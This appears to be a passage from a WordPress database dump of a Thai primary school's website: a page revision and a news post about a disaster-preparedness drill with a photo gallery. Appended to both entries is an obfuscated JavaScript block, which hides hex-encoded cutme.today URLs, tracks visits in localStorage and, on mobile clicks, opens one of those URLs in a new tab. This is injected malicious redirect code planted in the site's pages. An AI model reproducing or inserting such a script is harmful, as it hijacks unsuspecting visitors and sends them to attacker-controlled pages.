gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-20 11:43:25','2024-08-20 04:43:25','',14,'http://pakhaeng.ssk.in.th/?p=904',0,'revision','',0),
(905,1,'2024-08-20 12:03:21','2024-08-20 05:03:21','<!-- wp:paragraph -->\n<p>วันที่ 19 สิงหาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับ องค์การบริหารส่วนตำบลโพธิ์ จัดกิจกรรมตามโครงการโครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567 เพื่อให้นักเรียนและบุคลากร ได้ปฏิบัติได้เมื่อเกิดสถานการณ์ที่ไม่คาดคิดเกิดคิด ได้อย่างทันทีและเกิดควาปลอดภัยแก่ตนเองและนักเรียน โดยกิจกรรมนี้ มีนักเรียนที่เข้าร่วม ได้แก่นักเรียนโรงเรียนบ้านผักขย่าใหญ่ และโรงเรียนบ้านปลาข่อ เข้าร่วมกิจกรรมครั้งนี้  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":964,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214221_0-2-1024x576.jpg\" alt=\"\" class=\"wp-image-964\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":965,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214223_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-965\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":966,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214213_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-966\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":967,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214215_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-967\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":968,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214216_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-968\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":969,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214217_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-969\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":971,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214218_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-971\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":970,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214219_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-970\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":973,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214220_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-973\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":972,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214222_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-972\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":975,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214231_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-975\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":974,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214232_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-974\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":976,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214233_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-976\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":977,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214234_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-977\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":978,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214224_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-978\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":979,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214226_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-979\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":980,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214227_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-980\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":981,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214228_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-981\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":982,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214229_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-982\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":983,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214230_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-983\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":984,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214237_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-984\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":985,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214239_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-985\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":986,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214240_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-986\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":987,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214241_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-987\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":988,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214242_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-988\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":989,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214243_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-989\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":990,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214244_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-990\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":991,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214245_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-991\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":992,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214235_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-992\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":993,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214238_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-993\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":995,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214248_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-995\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":994,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214250_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-994\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":996,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214252_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-996\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":997,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214246_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-997\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":998,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214249_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-998\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":999,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214251_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-999\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 